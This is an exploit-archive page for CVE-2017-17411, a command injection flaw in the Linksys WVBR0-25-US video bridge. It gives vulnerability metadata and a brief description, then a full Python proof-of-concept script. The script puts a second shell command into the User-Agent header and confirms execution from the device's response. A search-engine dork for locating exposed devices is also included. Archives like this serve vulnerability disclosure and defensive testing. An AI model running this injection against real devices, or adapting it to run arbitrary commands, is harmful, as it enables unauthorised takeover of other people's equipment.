header-logo
Suggest Exploit
vendor:
WVBR0-25-US
by:
Nixawk
9,8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: WVBR0-25-US
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2017-17411
CPE: h:linksys:wvbr0-25-us
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Linksys WVBR0 25 Command Injection

Linksys WVBR0 25 is vulnerable to command injection due to improper input validation. An attacker can send a malicious HTTP request with a crafted User-Agent header to exploit this vulnerability. This can allow an attacker to execute arbitrary commands on the vulnerable system.

Mitigation:

Input validation should be done properly to prevent command injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection

"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>

$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""

import requests


def check(url):
    payload = '"; echo "admin'
    md5hash = "456b7016a916a4b178dd72b947c152b7"  # echo "admin" | md5sum

    resp = send_http_request(url, payload)

    if not resp:
        return False

    lines = resp.text.splitlines()
    sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)

    if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
        return False

    if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
        return False

    print("[+] Target is exploitable by CVE-2017-17411 ")
    return True


def send_http_request(url, payload):
    headers = {
        'User-Agent': payload
    }

    response = None
    try:
        response = requests.get(url, headers=headers)
    except Exception as err:
        log.exception(err)

    return response


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 2:
        print("[*] Usage: python %s <URL>" % sys.argv[0])
        sys.exit(0)

    check(sys.argv[1])


# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"

## References

# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

Navigation

Suggest Exploit

Services By CQR